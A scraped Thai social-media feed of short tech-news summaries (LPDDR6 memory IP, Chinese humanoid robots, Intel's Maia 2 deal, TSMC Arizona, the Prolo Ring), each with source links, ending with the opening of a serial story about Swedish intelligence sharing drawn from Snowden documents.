    ⚙️ “Synopsys เปิดตัว LPDDR6 IP บนเทคโนโลยี TSMC N2P — แบนด์วิดท์พุ่งแตะ 86 GB/s” Synopsys ประกาศความสำเร็จในการ “bring-up” หรือเปิดใช้งานซิลิคอนจริงของ IP หน่วยความจำ LPDDR6 บนเทคโนโลยีการผลิตระดับ 2 นาโนเมตร N2P ของ TSMC ซึ่งถือเป็นก้าวสำคัญในการพัฒนา IP ที่พร้อมให้ลูกค้านำไปใช้งานจริง LPDDR6 IP ดังกล่าวประกอบด้วยสองส่วนหลัก: ตัวควบคุม (controller) และอินเทอร์เฟซ PHY โดยตัวควบคุมรองรับโปรโตคอล JEDEC, การควบคุมเวลา (timing control) และโหมดประหยัดพลังงาน ส่วน PHY ถูกสร้างขึ้นบนวงจรอนาล็อกและ I/O ของ N2P พร้อมใช้ metal stack และไลบรารีเฉพาะของ N2P Synopsys ระบุว่า IP นี้สามารถทำความเร็วได้ถึง 86 GB/s ซึ่งใกล้เคียงกับมาตรฐาน JEDEC ที่ 10.667 Gb/s ต่อ pin โดยมีเป้าหมายสูงสุดที่ 14.4 Gb/s ต่อ pin หรือราว 115 GB/s เมื่อรวมทุกช่องสัญญาณ ข้อได้เปรียบของการใช้ N2P คือประสิทธิภาพด้านพลังงาน (PPA) ที่ดีขึ้น ทำให้หน่วยความจำใช้พลังงานต่อบิตน้อยลง และมีขนาดเล็กลง เหมาะสำหรับอุปกรณ์ที่ต้องการประสิทธิภาพสูงแต่ประหยัดพลังงาน เช่น AI บนอุปกรณ์ (on-device AI) และแพลตฟอร์มพกพา Synopsys คาดว่า LPDDR6 จะกลายเป็นมาตรฐานหลักในปีหน้า โดยมีผู้ผลิตชิปและอุปกรณ์หลายรายเตรียมนำไปใช้งาน ✅ Synopsys เปิดตัว LPDDR6 IP ที่ผ่านการ bring-up บนเทคโนโลยี TSMC N2P ➡️ หมายถึงการเปิดใช้งานซิลิคอนจริงสำเร็จ ✅ IP ประกอบด้วย controller และ PHY interface ➡️ รองรับโปรโตคอล JEDEC และโหมดประหยัดพลังงาน ✅ ความเร็วสูงสุดที่ทำได้คือ 86 GB/s ➡️ ใกล้เคียงกับมาตรฐาน JEDEC ที่ 10.667 Gb/s ต่อ pin ✅ ใช้เทคโนโลยี N2P ของ TSMC ที่มี PPA สูง ➡️ ช่วยลดพลังงานต่อบิตและขนาดของชิป ✅ เหมาะสำหรับ on-device AI และแพลตฟอร์มประหยัดพลังงาน ➡️ เช่น สมาร์ตโฟน, แท็บเล็ต, หรืออุปกรณ์ edge AI ✅ LPDDR6 คาดว่าจะกลายเป็นมาตรฐานหลักในปี 2026 ➡️ ผู้ผลิตชิปหลายรายเตรียมนำไปใช้งาน https://wccftech.com/synopsys-unveils-silicon-bring-up-of-lpddr6-ip-on-tsmc-n2p-node/
    WCCFTECH.COM
    Synopsys Unveils 'Silicon Bring-Up' of LPDDR6 IP On TSMC's Cutting-Edge N2P Node, Reaching Bandwidth Up to a Whopping 86 GB/s
    Synopsys has unveiled a massive development in the realm of mobile memory, as it announced the silicon bring-up of its LPDDR6 IP.
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • “จีนเขย่าโลกด้วยหุ่นยนต์ AI หน้าตาเหมือนมนุษย์” — เมื่อการแสดงอารมณ์และการเคลื่อนไหวกลายเป็นสมรภูมิใหม่ของหุ่นยนต์ฮิวแมนนอยด์

    สองบริษัทจีน AheadForm และ Kepler Robotics กำลังผลักดันขีดจำกัดของหุ่นยนต์ฮิวแมนนอยด์ไปอีกขั้น ด้วยการพัฒนา “ใบหน้า” และ “ร่างกาย” ที่เลียนแบบมนุษย์ได้อย่างน่าทึ่ง

    AheadForm โฟกัสที่ “การแสดงออกทางสีหน้า” โดยใช้มอเตอร์แบบไร้แปรงและผิวสังเคราะห์ที่นุ่ม เพื่อให้หุ่นยนต์สามารถขยับเปลือกตา ริมฝีปาก และคิ้วได้อย่างละเอียดลึกซึ้ง หุ่นต้นแบบชื่อ “Xuan” สามารถแสดงอารมณ์ผ่านการพูด การมอง และการขยับหน้าได้อย่างสมจริงจนน่าขนลุก

    Kepler Robotics มุ่งพัฒนา “การเคลื่อนไหวของร่างกาย” หุ่นยนต์รุ่น K2 Bumblebee สามารถเดินบนพื้นผิวต่าง ๆ ได้อย่างมั่นคง แม้ถูกผลักก็ยังทรงตัวได้ ด้วยระบบขับเคลื่อนแบบ hybrid ที่เลียนแบบกล้ามเนื้อใหญ่และข้อต่อเล็กของมนุษย์

    ทั้งสองบริษัทใช้ AI ขั้นสูงในการควบคุมการเคลื่อนไหวและการตอบสนองต่อสิ่งแวดล้อม โดย Kepler ยังโชว์ให้เห็นว่า Bumblebee สามารถเข้าใจคำสั่งเสียง เรียนรู้ผ่าน reinforcement และควบคุมแรงบิดได้อย่างแม่นยำ

    เป้าหมายของพวกเขาคือการสร้างหุ่นยนต์ที่สามารถทำงานร่วมกับมนุษย์ได้อย่าง “เป็นธรรมชาติ” ไม่ว่าจะในโรงเรียน โรงพยาบาล หรือร้านค้า แม้บางคนจะรู้สึกไม่สบายใจเมื่อเห็นหุ่นยนต์ที่เหมือนมนุษย์เกินไปก็ตาม

    AheadForm พัฒนาหุ่นยนต์ที่แสดงสีหน้าได้สมจริง
    ใช้มอเตอร์ไร้แปรงและผิวสังเคราะห์ควบคุมการขยับละเอียด

    หุ่นต้นแบบ “Xuan” แสดงอารมณ์ผ่านการพูดและการมอง
    ควบคุมด้วย AI ที่จำลองการทำงานของกล้ามเนื้อใบหน้า

    Kepler Robotics พัฒนา K2 Bumblebee ที่เคลื่อนไหวได้เหมือนมนุษย์
    เดินบนพื้นต่าง ๆ ได้ดีและทรงตัวแม้ถูกผลัก

    ใช้ระบบ hybrid actuation เลียนแบบกล้ามเนื้อและข้อต่อ
    เพิ่มความแม่นยำและประหยัดพลังงาน

    Bumblebee เข้าใจคำสั่งเสียงและเรียนรู้ผ่าน reinforcement
    มี 52 องศาการเคลื่อนไหวและเซ็นเซอร์ในตัว 80 ตัว

    เป้าหมายคือใช้ในงานบริการ เช่น การศึกษา การแพทย์ และค้าปลีก
    เพื่อให้หุ่นยนต์ “เข้าถึงได้” และ “เป็นธรรมชาติ” มากขึ้น

    https://www.slashgear.com/1996011/china-ai-robots-humanoid-characteristics/
    🤖 “จีนเขย่าโลกด้วยหุ่นยนต์ AI หน้าตาเหมือนมนุษย์” — เมื่อการแสดงอารมณ์และการเคลื่อนไหวกลายเป็นสมรภูมิใหม่ของหุ่นยนต์ฮิวแมนนอยด์ สองบริษัทจีน AheadForm และ Kepler Robotics กำลังผลักดันขีดจำกัดของหุ่นยนต์ฮิวแมนนอยด์ไปอีกขั้น ด้วยการพัฒนา “ใบหน้า” และ “ร่างกาย” ที่เลียนแบบมนุษย์ได้อย่างน่าทึ่ง 🧠 AheadForm โฟกัสที่ “การแสดงออกทางสีหน้า” โดยใช้มอเตอร์แบบไร้แปรงและผิวสังเคราะห์ที่นุ่ม เพื่อให้หุ่นยนต์สามารถขยับเปลือกตา ริมฝีปาก และคิ้วได้อย่างละเอียดลึกซึ้ง หุ่นต้นแบบชื่อ “Xuan” สามารถแสดงอารมณ์ผ่านการพูด การมอง และการขยับหน้าได้อย่างสมจริงจนน่าขนลุก 🦿 Kepler Robotics มุ่งพัฒนา “การเคลื่อนไหวของร่างกาย” หุ่นยนต์รุ่น K2 Bumblebee สามารถเดินบนพื้นผิวต่าง ๆ ได้อย่างมั่นคง แม้ถูกผลักก็ยังทรงตัวได้ ด้วยระบบขับเคลื่อนแบบ hybrid ที่เลียนแบบกล้ามเนื้อใหญ่และข้อต่อเล็กของมนุษย์ ทั้งสองบริษัทใช้ AI ขั้นสูงในการควบคุมการเคลื่อนไหวและการตอบสนองต่อสิ่งแวดล้อม โดย Kepler ยังโชว์ให้เห็นว่า Bumblebee สามารถเข้าใจคำสั่งเสียง เรียนรู้ผ่าน reinforcement และควบคุมแรงบิดได้อย่างแม่นยำ เป้าหมายของพวกเขาคือการสร้างหุ่นยนต์ที่สามารถทำงานร่วมกับมนุษย์ได้อย่าง “เป็นธรรมชาติ” ไม่ว่าจะในโรงเรียน โรงพยาบาล หรือร้านค้า แม้บางคนจะรู้สึกไม่สบายใจเมื่อเห็นหุ่นยนต์ที่เหมือนมนุษย์เกินไปก็ตาม ✅ AheadForm พัฒนาหุ่นยนต์ที่แสดงสีหน้าได้สมจริง ➡️ ใช้มอเตอร์ไร้แปรงและผิวสังเคราะห์ควบคุมการขยับละเอียด ✅ หุ่นต้นแบบ “Xuan” แสดงอารมณ์ผ่านการพูดและการมอง ➡️ ควบคุมด้วย AI ที่จำลองการทำงานของกล้ามเนื้อใบหน้า ✅ Kepler Robotics พัฒนา K2 Bumblebee ที่เคลื่อนไหวได้เหมือนมนุษย์ ➡️ เดินบนพื้นต่าง ๆ ได้ดีและทรงตัวแม้ถูกผลัก ✅ ใช้ระบบ hybrid actuation เลียนแบบกล้ามเนื้อและข้อต่อ ➡️ เพิ่มความแม่นยำและประหยัดพลังงาน ✅ Bumblebee เข้าใจคำสั่งเสียงและเรียนรู้ผ่าน reinforcement ➡️ มี 52 องศาการเคลื่อนไหวและเซ็นเซอร์ในตัว 80 ตัว ✅ เป้าหมายคือใช้ในงานบริการ เช่น การศึกษา การแพทย์ และค้าปลีก ➡️ เพื่อให้หุ่นยนต์ “เข้าถึงได้” และ “เป็นธรรมชาติ” มากขึ้น https://www.slashgear.com/1996011/china-ai-robots-humanoid-characteristics/
    WWW.SLASHGEAR.COM
    China's AI Robots Are Shocking The World With Their Humanoid Characteristics - SlashGear
    Combining expressive AI with bionic design, China’s humanoid robots from AheadForm and Kepler can walk, talk, and react like real humans.
    0 ความคิดเห็น 0 การแบ่งปัน 71 มุมมอง 0 รีวิว
  • “Intel Foundry คว้าดีลผลิตชิป AI Maia 2 ให้ Microsoft บนเทคโนโลยี 18A” — ก้าวสำคัญสู่ความร่วมมือระยะยาวในยุค AI

    Intel Foundry ได้รับสัญญาผลิตชิป AI รุ่นใหม่ของ Microsoft ในตระกูล Maia 2 โดยใช้เทคโนโลยีการผลิตระดับ 18A และ 18A-P ซึ่งถือเป็นหนึ่งในกระบวนการผลิตที่ล้ำหน้าที่สุดของ Intel ในปัจจุบัน โดยรายงานจาก SemiAccurate ระบุว่า Microsoft จะใช้ Intel Foundry เป็นฐานการผลิตหลักสำหรับชิป AI รุ่นถัดไป ซึ่งอาจเป็นจุดเริ่มต้นของความร่วมมือระยะยาวระหว่างสองยักษ์ใหญ่

    Maia 2 เป็นชิป AI ขนาดใหญ่ระดับใกล้ reticle size (ประมาณ 820 mm²) ที่ออกแบบมาเพื่อใช้งานในศูนย์ข้อมูล Azure โดยมีเป้าหมายเพื่อเพิ่มประสิทธิภาพและลดต้นทุนการเป็นเจ้าของ (TCO) เมื่อเทียบกับการใช้ GPU จาก Nvidia ซึ่ง Microsoft ยังใช้อยู่เป็นหลักในปัจจุบัน

    การเลือก Intel Foundry แทน TSMC มีความหมายเชิงยุทธศาสตร์ เพราะช่วยลดความเสี่ยงจากข้อจำกัดด้านกำลังการผลิตและการบรรจุชิปขั้นสูงที่ TSMC เผชิญอยู่ อีกทั้งยังสอดคล้องกับนโยบายของรัฐบาลสหรัฐฯ ที่สนับสนุนการผลิตชิปภายในประเทศ

    Intel คาดว่าเทคโนโลยี 18A จะมี yield สูงพอสำหรับการผลิตชิปขนาดใหญ่แบบนี้ โดยอาจใช้เทคนิค partitioning เป็น chiplet หลายตัวเชื่อมด้วย EMIB หรือ Foveros แต่ Microsoft น่าจะเลือกใช้ดีไซน์แบบ monolithic เพื่อประสิทธิภาพสูงสุด

    Intel Foundry ได้รับสัญญาผลิตชิป AI Maia 2 ให้ Microsoft
    ใช้เทคโนโลยีการผลิตระดับ 18A และ 18A-P

    Maia 2 เป็นชิปขนาดใหญ่ระดับใกล้ reticle size (820 mm²)
    มีทรานซิสเตอร์มากกว่า 105 พันล้านตัว

    Microsoft ใช้ชิปนี้ในศูนย์ข้อมูล Azure เพื่อเพิ่มประสิทธิภาพและลด TCO
    เปรียบเทียบกับ GPU จาก Nvidia ที่ใช้อยู่ในปัจจุบัน

    การเลือก Intel Foundry ช่วยลดความเสี่ยงจากข้อจำกัดของ TSMC
    ทั้งด้านกำลังการผลิตและการบรรจุชิปขั้นสูง

    สอดคล้องกับนโยบายของรัฐบาลสหรัฐฯ ที่สนับสนุนการผลิตในประเทศ
    เพิ่มความมั่นคงของห่วงโซ่อุปทาน

    Intel คาดว่า yield ของ 18A จะสูงพอสำหรับชิปขนาดใหญ่
    อาจใช้ EMIB หรือ Foveros หากต้องแบ่งเป็น chiplet

    https://www.tomshardware.com/tech-industry/semiconductors/intel-foundry-secures-contract-to-build-microsofts-maia-2-next-gen-ai-processor-on-18a-18a-p-node-claims-report-could-be-first-step-in-ongoing-partnership
    🤝 “Intel Foundry คว้าดีลผลิตชิป AI Maia 2 ให้ Microsoft บนเทคโนโลยี 18A” — ก้าวสำคัญสู่ความร่วมมือระยะยาวในยุค AI Intel Foundry ได้รับสัญญาผลิตชิป AI รุ่นใหม่ของ Microsoft ในตระกูล Maia 2 โดยใช้เทคโนโลยีการผลิตระดับ 18A และ 18A-P ซึ่งถือเป็นหนึ่งในกระบวนการผลิตที่ล้ำหน้าที่สุดของ Intel ในปัจจุบัน โดยรายงานจาก SemiAccurate ระบุว่า Microsoft จะใช้ Intel Foundry เป็นฐานการผลิตหลักสำหรับชิป AI รุ่นถัดไป ซึ่งอาจเป็นจุดเริ่มต้นของความร่วมมือระยะยาวระหว่างสองยักษ์ใหญ่ Maia 2 เป็นชิป AI ขนาดใหญ่ระดับใกล้ reticle size (ประมาณ 820 mm²) ที่ออกแบบมาเพื่อใช้งานในศูนย์ข้อมูล Azure โดยมีเป้าหมายเพื่อเพิ่มประสิทธิภาพและลดต้นทุนการเป็นเจ้าของ (TCO) เมื่อเทียบกับการใช้ GPU จาก Nvidia ซึ่ง Microsoft ยังใช้อยู่เป็นหลักในปัจจุบัน การเลือก Intel Foundry แทน TSMC มีความหมายเชิงยุทธศาสตร์ เพราะช่วยลดความเสี่ยงจากข้อจำกัดด้านกำลังการผลิตและการบรรจุชิปขั้นสูงที่ TSMC เผชิญอยู่ อีกทั้งยังสอดคล้องกับนโยบายของรัฐบาลสหรัฐฯ ที่สนับสนุนการผลิตชิปภายในประเทศ Intel คาดว่าเทคโนโลยี 18A จะมี yield สูงพอสำหรับการผลิตชิปขนาดใหญ่แบบนี้ โดยอาจใช้เทคนิค partitioning เป็น chiplet หลายตัวเชื่อมด้วย EMIB หรือ Foveros แต่ Microsoft น่าจะเลือกใช้ดีไซน์แบบ monolithic เพื่อประสิทธิภาพสูงสุด ✅ Intel Foundry ได้รับสัญญาผลิตชิป AI Maia 2 ให้ Microsoft ➡️ ใช้เทคโนโลยีการผลิตระดับ 18A และ 18A-P ✅ Maia 2 เป็นชิปขนาดใหญ่ระดับใกล้ reticle size (820 mm²) ➡️ มีทรานซิสเตอร์มากกว่า 105 พันล้านตัว ✅ Microsoft ใช้ชิปนี้ในศูนย์ข้อมูล Azure เพื่อเพิ่มประสิทธิภาพและลด TCO ➡️ เปรียบเทียบกับ GPU จาก Nvidia ที่ใช้อยู่ในปัจจุบัน ✅ การเลือก Intel Foundry ช่วยลดความเสี่ยงจากข้อจำกัดของ TSMC ➡️ ทั้งด้านกำลังการผลิตและการบรรจุชิปขั้นสูง ✅ สอดคล้องกับนโยบายของรัฐบาลสหรัฐฯ ที่สนับสนุนการผลิตในประเทศ ➡️ เพิ่มความมั่นคงของห่วงโซ่อุปทาน ✅ Intel คาดว่า yield ของ 18A จะสูงพอสำหรับชิปขนาดใหญ่ ➡️ อาจใช้ EMIB หรือ Foveros หากต้องแบ่งเป็น chiplet https://www.tomshardware.com/tech-industry/semiconductors/intel-foundry-secures-contract-to-build-microsofts-maia-2-next-gen-ai-processor-on-18a-18a-p-node-claims-report-could-be-first-step-in-ongoing-partnership
    0 ความคิดเห็น 0 การแบ่งปัน 122 มุมมอง 0 รีวิว
  • “TSMC เร่งแผนผลิตชิป 2nm ในแอริโซนา พร้อมขยายโรงงานเกินงบ $165 พันล้าน” — เมื่อดีมานด์ AI ดันโรงงานสหรัฐฯ สู่ระดับ Gigafab

    TSMC ประกาศเร่งแผนการผลิตชิปขนาด 2 นาโนเมตร (2nm) ที่โรงงานในรัฐแอริโซนา สหรัฐอเมริกา โดยอ้างอิงจากความต้องการชิป AI ที่เพิ่มขึ้นอย่างต่อเนื่องจากลูกค้าในสหรัฐฯ เช่น Apple, Nvidia และ Broadcom

    เดิมที TSMC คาดว่าจะเริ่มผลิตชิป 2nm ในสหรัฐฯ ได้ภายในปี 2030 แต่ตอนนี้มีแนวโน้มว่าจะเลื่อนขึ้นมาเร็วขึ้นราว 1 ปี โดยยังไม่ระบุไทม์ไลน์ที่แน่นอน

    นอกจากนี้ C.C. Wei ซีอีโอของ TSMC ยังเผยว่าบริษัทกำลังอยู่ระหว่างการเจรจาซื้อที่ดินเพิ่มเติมใกล้กับโรงงานเดิม เพื่อขยายเป็น “Gigafab cluster” ที่สามารถผลิตเวเฟอร์ 12 นิ้วได้ถึง 100,000 แผ่นต่อเดือน พร้อมมีระบบบรรจุภัณฑ์และทดสอบชิปในพื้นที่เดียวกัน

    TSMC ยังลงทุนในโครงการฝึกงานในแอริโซนาเพื่อสร้างบุคลากรในท้องถิ่น โดยเพิ่มจำนวนผู้เข้าร่วมจาก 130 เป็น 200 คน และมองว่าแผนนี้จะช่วยสร้างระบบนิเวศด้านเซมิคอนดักเตอร์ในสหรัฐฯ ได้อย่างยั่งยืน

    TSMC เร่งแผนผลิตชิป 2nm ในโรงงานแอริโซนา
    เดิมคาดเริ่มผลิตปี 2030 แต่จะเลื่อนขึ้นราว 1 ปี

    ความต้องการชิป AI จากลูกค้าในสหรัฐฯ เป็นแรงผลักดันหลัก
    ลูกค้าหลักได้แก่ Apple, Nvidia, Broadcom

    กำลังเจรจาซื้อที่ดินเพิ่มเติมเพื่อขยายโรงงาน
    เป้าหมายคือสร้าง “Gigafab cluster” ที่ผลิตได้ 100,000 เวเฟอร์/เดือน

    จะมีระบบบรรจุภัณฑ์และทดสอบชิปในพื้นที่เดียวกัน
    ลดการพึ่งพาห่วงโซ่อุปทานต่างประเทศ

    โครงการฝึกงานในแอริโซนาเพิ่มจาก 130 เป็น 200 คน
    สร้างบุคลากรท้องถิ่นรองรับการขยายโรงงาน

    https://www.tomshardware.com/tech-industry/tsmc-moves-up-2nm-production-plans-in-arizona-ceo-also-hints-at-further-site-expansion-beyond-usd165-billion-commitment
    🏭 “TSMC เร่งแผนผลิตชิป 2nm ในแอริโซนา พร้อมขยายโรงงานเกินงบ $165 พันล้าน” — เมื่อดีมานด์ AI ดันโรงงานสหรัฐฯ สู่ระดับ Gigafab TSMC ประกาศเร่งแผนการผลิตชิปขนาด 2 นาโนเมตร (2nm) ที่โรงงานในรัฐแอริโซนา สหรัฐอเมริกา โดยอ้างอิงจากความต้องการชิป AI ที่เพิ่มขึ้นอย่างต่อเนื่องจากลูกค้าในสหรัฐฯ เช่น Apple, Nvidia และ Broadcom เดิมที TSMC คาดว่าจะเริ่มผลิตชิป 2nm ในสหรัฐฯ ได้ภายในปี 2030 แต่ตอนนี้มีแนวโน้มว่าจะเลื่อนขึ้นมาเร็วขึ้นราว 1 ปี โดยยังไม่ระบุไทม์ไลน์ที่แน่นอน นอกจากนี้ C.C. Wei ซีอีโอของ TSMC ยังเผยว่าบริษัทกำลังอยู่ระหว่างการเจรจาซื้อที่ดินเพิ่มเติมใกล้กับโรงงานเดิม เพื่อขยายเป็น “Gigafab cluster” ที่สามารถผลิตเวเฟอร์ 12 นิ้วได้ถึง 100,000 แผ่นต่อเดือน พร้อมมีระบบบรรจุภัณฑ์และทดสอบชิปในพื้นที่เดียวกัน TSMC ยังลงทุนในโครงการฝึกงานในแอริโซนาเพื่อสร้างบุคลากรในท้องถิ่น โดยเพิ่มจำนวนผู้เข้าร่วมจาก 130 เป็น 200 คน และมองว่าแผนนี้จะช่วยสร้างระบบนิเวศด้านเซมิคอนดักเตอร์ในสหรัฐฯ ได้อย่างยั่งยืน ✅ TSMC เร่งแผนผลิตชิป 2nm ในโรงงานแอริโซนา ➡️ เดิมคาดเริ่มผลิตปี 2030 แต่จะเลื่อนขึ้นราว 1 ปี ✅ ความต้องการชิป AI จากลูกค้าในสหรัฐฯ เป็นแรงผลักดันหลัก ➡️ ลูกค้าหลักได้แก่ Apple, Nvidia, Broadcom ✅ กำลังเจรจาซื้อที่ดินเพิ่มเติมเพื่อขยายโรงงาน ➡️ เป้าหมายคือสร้าง “Gigafab cluster” ที่ผลิตได้ 100,000 เวเฟอร์/เดือน ✅ จะมีระบบบรรจุภัณฑ์และทดสอบชิปในพื้นที่เดียวกัน ➡️ ลดการพึ่งพาห่วงโซ่อุปทานต่างประเทศ ✅ โครงการฝึกงานในแอริโซนาเพิ่มจาก 130 เป็น 200 คน ➡️ สร้างบุคลากรท้องถิ่นรองรับการขยายโรงงาน https://www.tomshardware.com/tech-industry/tsmc-moves-up-2nm-production-plans-in-arizona-ceo-also-hints-at-further-site-expansion-beyond-usd165-billion-commitment
    0 ความคิดเห็น 0 การแบ่งปัน 138 มุมมอง 0 รีวิว
  • “Prolo Ring แหวนควบคุมคอมพิวเตอร์ด้วยนิ้ว — อุปกรณ์สวมใส่ที่อาจเปลี่ยนวิธีใช้เมาส์ไปตลอดกาล” — เมื่อการควบคุมคอมพิวเตอร์ไม่ต้องใช้เมาส์อีกต่อไป แค่ขยับนิ้วก็สั่งงานได้

    Prolo Ring คืออุปกรณ์สวมใส่ที่เปิดตัวผ่าน Kickstarter โดยมีเป้าหมายเปลี่ยนวิธีที่เราควบคุมคอมพิวเตอร์ ด้วยการใช้แหวนที่สวมบนนิ้วแทนเมาส์แบบเดิม ๆ ตัวแหวนทำจากอะลูมิเนียมชุบอโนไดซ์ มีให้เลือก 3 สี และประกอบด้วย 3 ส่วนหลัก: เซนเซอร์ตรวจจับการเคลื่อนไหวแบบ 6 แกน, แทร็กแพดขนาดเล็ก และ “modstrip” ที่ทำหน้าที่เป็นปุ่มเสริม

    แทร็กแพดบนแหวนสามารถแตะ, กดค้าง, หรือปัดเพื่อสั่งงาน เช่น คลิกขวา, เปิดเมนู, เล่น/หยุดวิดีโอ หรือปรับระดับเสียง ส่วน modstrip จะช่วยเพิ่มฟังก์ชันให้แทร็กแพด เช่น ใช้เป็นปุ่ม Shift หรือ Ctrl เพื่อเรียกคำสั่งพิเศษ

    ที่น่าสนใจคือ Prolo Ring รองรับการตั้งค่ามาโครผ่านแอป companion และสามารถสั่งงานด้วย “air gestures” ได้มากกว่า 40 รูปแบบ เช่น ปัดนิ้วกลางอากาศเพื่อเปลี่ยนภาพ ซึ่งคล้ายกับเทคโนโลยี Soli ของ Google ที่เคยใช้ใน Pixel 4 XL

    แหวนนี้เชื่อมต่อผ่าน Bluetooth และสามารถใช้งานได้กับทุกระบบปฏิบัติการโดยไม่ต้องใช้แอปเสริม แต่หากต้องการใช้ฟีเจอร์ขั้นสูง เช่น การตั้งค่ามาโครหรือปรับแต่ง gesture ผู้ใช้ต้องมี “license” ซึ่งมีเฉพาะในรุ่น Pro ราคา $149 ขึ้นไป โดยรุ่นพื้นฐาน $99 และ $129 ไม่รวม license นี้

    แบตเตอรี่ใช้งานได้ 8 ชั่วโมงต่อการชาร์จหนึ่งครั้ง และสามารถชาร์จผ่านเคสไร้สายที่เก็บพลังงานได้ถึง 30 วัน

    Prolo Ring เป็นอุปกรณ์สวมใส่ที่ควบคุมคอมพิวเตอร์ด้วยนิ้ว
    ใช้เซนเซอร์ 6 แกน, แทร็กแพด และ modstrip

    แทร็กแพดรองรับการแตะ, กดค้าง, ปัด เพื่อสั่งงาน
    ใช้ควบคุมเมนู, เล่น/หยุดวิดีโอ, ปรับเสียง ฯลฯ

    modstrip ทำหน้าที่เป็นปุ่มเสริมเพื่อเพิ่มฟังก์ชัน
    ใช้ร่วมกับแทร็กแพดเพื่อเรียกคำสั่งพิเศษ

    รองรับ air gestures มากกว่า 40 รูปแบบ
    เช่น ปัดนิ้วเพื่อเปลี่ยนภาพหรือเลื่อนสไลด์

    เชื่อมต่อผ่าน Bluetooth และรองรับทุกระบบปฏิบัติการ
    ใช้งานได้แม้ไม่ติดตั้งแอป companion

    แอป companion ใช้ตั้งค่ามาโครและปรับแต่ง gesture
    ต้องมี license เพื่อใช้งานฟีเจอร์ขั้นสูง

    รุ่น Pro ราคา $149 ขึ้นไปเท่านั้นที่มี license
    รุ่น $99 และ $129 ไม่รวม license

    แบตเตอรี่ใช้งานได้ 8 ชั่วโมงต่อการชาร์จ
    เคสไร้สายเก็บพลังงานได้ถึง 30 วัน

    https://www.tomshardware.com/peripherals/wearable-tech/give-your-mouse-the-finger-with-this-wild-cursor-control-ring-prolo-ring-hits-kickstarter-hoping-to-transform-your-finger-into-the-ultimate-macro-and-gesture-device
    💍 “Prolo Ring แหวนควบคุมคอมพิวเตอร์ด้วยนิ้ว — อุปกรณ์สวมใส่ที่อาจเปลี่ยนวิธีใช้เมาส์ไปตลอดกาล” — เมื่อการควบคุมคอมพิวเตอร์ไม่ต้องใช้เมาส์อีกต่อไป แค่ขยับนิ้วก็สั่งงานได้ Prolo Ring คืออุปกรณ์สวมใส่ที่เปิดตัวผ่าน Kickstarter โดยมีเป้าหมายเปลี่ยนวิธีที่เราควบคุมคอมพิวเตอร์ ด้วยการใช้แหวนที่สวมบนนิ้วแทนเมาส์แบบเดิม ๆ ตัวแหวนทำจากอะลูมิเนียมชุบอโนไดซ์ มีให้เลือก 3 สี และประกอบด้วย 3 ส่วนหลัก: เซนเซอร์ตรวจจับการเคลื่อนไหวแบบ 6 แกน, แทร็กแพดขนาดเล็ก และ “modstrip” ที่ทำหน้าที่เป็นปุ่มเสริม แทร็กแพดบนแหวนสามารถแตะ, กดค้าง, หรือปัดเพื่อสั่งงาน เช่น คลิกขวา, เปิดเมนู, เล่น/หยุดวิดีโอ หรือปรับระดับเสียง ส่วน modstrip จะช่วยเพิ่มฟังก์ชันให้แทร็กแพด เช่น ใช้เป็นปุ่ม Shift หรือ Ctrl เพื่อเรียกคำสั่งพิเศษ ที่น่าสนใจคือ Prolo Ring รองรับการตั้งค่ามาโครผ่านแอป companion และสามารถสั่งงานด้วย “air gestures” ได้มากกว่า 40 รูปแบบ เช่น ปัดนิ้วกลางอากาศเพื่อเปลี่ยนภาพ ซึ่งคล้ายกับเทคโนโลยี Soli ของ Google ที่เคยใช้ใน Pixel 4 XL แหวนนี้เชื่อมต่อผ่าน Bluetooth และสามารถใช้งานได้กับทุกระบบปฏิบัติการโดยไม่ต้องใช้แอปเสริม แต่หากต้องการใช้ฟีเจอร์ขั้นสูง เช่น การตั้งค่ามาโครหรือปรับแต่ง gesture ผู้ใช้ต้องมี “license” ซึ่งมีเฉพาะในรุ่น Pro ราคา $149 ขึ้นไป โดยรุ่นพื้นฐาน $99 และ $129 ไม่รวม license นี้ แบตเตอรี่ใช้งานได้ 8 ชั่วโมงต่อการชาร์จหนึ่งครั้ง และสามารถชาร์จผ่านเคสไร้สายที่เก็บพลังงานได้ถึง 30 วัน ✅ Prolo Ring เป็นอุปกรณ์สวมใส่ที่ควบคุมคอมพิวเตอร์ด้วยนิ้ว ➡️ ใช้เซนเซอร์ 6 แกน, แทร็กแพด และ modstrip ✅ แทร็กแพดรองรับการแตะ, กดค้าง, ปัด เพื่อสั่งงาน ➡️ ใช้ควบคุมเมนู, เล่น/หยุดวิดีโอ, ปรับเสียง ฯลฯ ✅ modstrip ทำหน้าที่เป็นปุ่มเสริมเพื่อเพิ่มฟังก์ชัน ➡️ ใช้ร่วมกับแทร็กแพดเพื่อเรียกคำสั่งพิเศษ ✅ รองรับ air gestures มากกว่า 40 รูปแบบ ➡️ เช่น ปัดนิ้วเพื่อเปลี่ยนภาพหรือเลื่อนสไลด์ ✅ เชื่อมต่อผ่าน Bluetooth และรองรับทุกระบบปฏิบัติการ ➡️ ใช้งานได้แม้ไม่ติดตั้งแอป companion ✅ แอป companion ใช้ตั้งค่ามาโครและปรับแต่ง gesture ➡️ ต้องมี license เพื่อใช้งานฟีเจอร์ขั้นสูง ✅ รุ่น Pro ราคา $149 ขึ้นไปเท่านั้นที่มี license ➡️ รุ่น $99 และ $129 ไม่รวม license ✅ แบตเตอรี่ใช้งานได้ 8 ชั่วโมงต่อการชาร์จ ➡️ เคสไร้สายเก็บพลังงานได้ถึง 30 วัน https://www.tomshardware.com/peripherals/wearable-tech/give-your-mouse-the-finger-with-this-wild-cursor-control-ring-prolo-ring-hits-kickstarter-hoping-to-transform-your-finger-into-the-ultimate-macro-and-gesture-device
    0 ความคิดเห็น 0 การแบ่งปัน 121 มุมมอง 0 รีวิว
  • ผลัดกันล้วง ตอนที่ 4
    นิทานเรื่องจริง เรื่อง “ผลัดกันล้วง”
    ตอนที่ 4 (ตอนจบ)

    “สวีเดน ทำการจารกรรมข้อมูลเกี่ยวกับ รัสเซีย ให้อเมริกามานานแล้ว ”

    โทรทัศน์ สวีเดน Sveriges Television ( SVT ) ออกข่าวนี้ ตั้งแต่ปลายปี 2013 บอกว่า เรื่องนี้อยู่ในเอกสาร ที่นาย Edward Snowden เอามาปูด จนต้องหนีหัวซุกหัวซุนไปน่ะและตอนนี้ นาย Snowden ก็คงกำลังนั่งซุกหัว ซุกตัว อยู่ในที่หลบภัยอุ่นๆ ตรงไหนสักแห่งหนึ่งของรัสเซีย และเล่าเรื่องที่มีรายละเอียดน่าสนใจเพิ่มเติม ให้เจ้าของที่หลบภัยฟังต่อ

